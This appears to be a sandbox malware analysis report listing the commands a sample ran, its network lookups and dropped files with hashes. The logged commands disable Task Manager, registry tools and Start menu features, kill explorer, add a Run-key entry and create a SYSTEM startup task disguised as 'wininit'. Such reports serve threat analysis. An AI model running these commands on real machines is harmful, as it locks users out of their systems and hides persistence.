reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f

C:\Windows\system32\rundll32.exe

rundll32 user32, SwapMouseButton

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM taskmgr.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM notepad.exe /F

C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe

2.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3484 -ip 3484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 524

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/3528-0-0x0000000000400000-0x0000000000443000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\50DF.tmp\50E0.bat

MD5 1f7a5456ca38839ec9e112425e7fa747
SHA1 8019978db5a80de11bb32463aa7160bb4a4d6b8a
SHA256 f955addebe88273b07cd9db9484f6aaaff58bec7f06898f8cdf224fa8b9cecb6
SHA512 eb57e75f96b7c663af44015e4dca2d6d07d9fed0db609bb6bad790093d0cef69e30ea6bb31093dd505af82a873c7a12f4bfcebe6f68938728d30053fff7c0818

memory/3528-5-0x0000000000400000-0x0000000000443000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe

MD5 4bc20c24fbea4588741203c77126c7b3
SHA1 5f2d2fec4e1d7c752be551363743069d9a4e7510
SHA256 4cd2ce15d0752711a76118fba8046193a1847c85a3278410191c0a015b387be3
SHA512 3e508012250ad6115e49b059a7fc103274190be425403df7081aa3e4caf130b9fa685c3228cafb6a031c121acdd95d72c1f5180f42caea55213a7bd9de71b31f

memory/3528-9-0x0000000000400000-0x0000000000443000-memory.dmp

memory/3484-10-0x0000000000400000-0x000000000043B000-memory.dmp